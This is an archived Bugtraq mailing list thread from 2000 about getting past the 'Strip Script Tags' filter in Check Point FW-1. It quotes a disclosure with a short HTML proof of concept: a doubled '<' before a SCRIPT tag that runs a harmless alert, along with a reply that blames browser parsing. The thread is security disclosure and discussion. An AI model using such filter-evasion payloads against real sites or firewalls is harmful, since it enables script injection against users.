[13620] in bugtraq

home help back first fref pref prev next nref lref last post

Re: "Strip Script Tags" in FW-1 can be circumvented

daemon@ATHENA.MIT.EDU (Jonah Kowall)
Tue Feb 1 12:53:47 2000

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id:  <8F04455EA3A3D21195A600104B72E3861E0182@yap.cinteractive.com>
Date:         Mon, 31 Jan 2000 14:28:29 -0500
Reply-To: Jonah Kowall <jkowall@CINTERACTIVE.COM>
From: Jonah Kowall <jkowall@CINTERACTIVE.COM>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

	I don't consider this a bug in FW-1, but a bug in the products
navigator, and internet explorer.  These tags shouldn't be parsed, because
they are malformed.  The firewall is stripping tags properly, but since
these tags are malformed you can't expect the firewall to be able to
recognize them as valid tags.


-----Original Message-----
From: Arne Vidstrom [mailto:arne.vidstrom@NTSECURITY.NU]
Sent: Saturday, January 29, 2000 8:52 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: "Strip Script Tags" in FW-1 can be circumvented


Hi all,

The "Strip Script Tags" in FW-1 can be circumvented by adding an extra <
before the <SCRIPT> tag like in this code:

<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>

This code will pass unchanged, and still execute in both Navigator and
Explorer. I tried this on version 3.0 of FW-1 (on Windows NT 4.0) but I'm
not able to check it on version 4.0 since I don't have access to it.


/Arne Vidstrom

http://ntsecurity.nu

home help back first fref pref prev next nref lref last post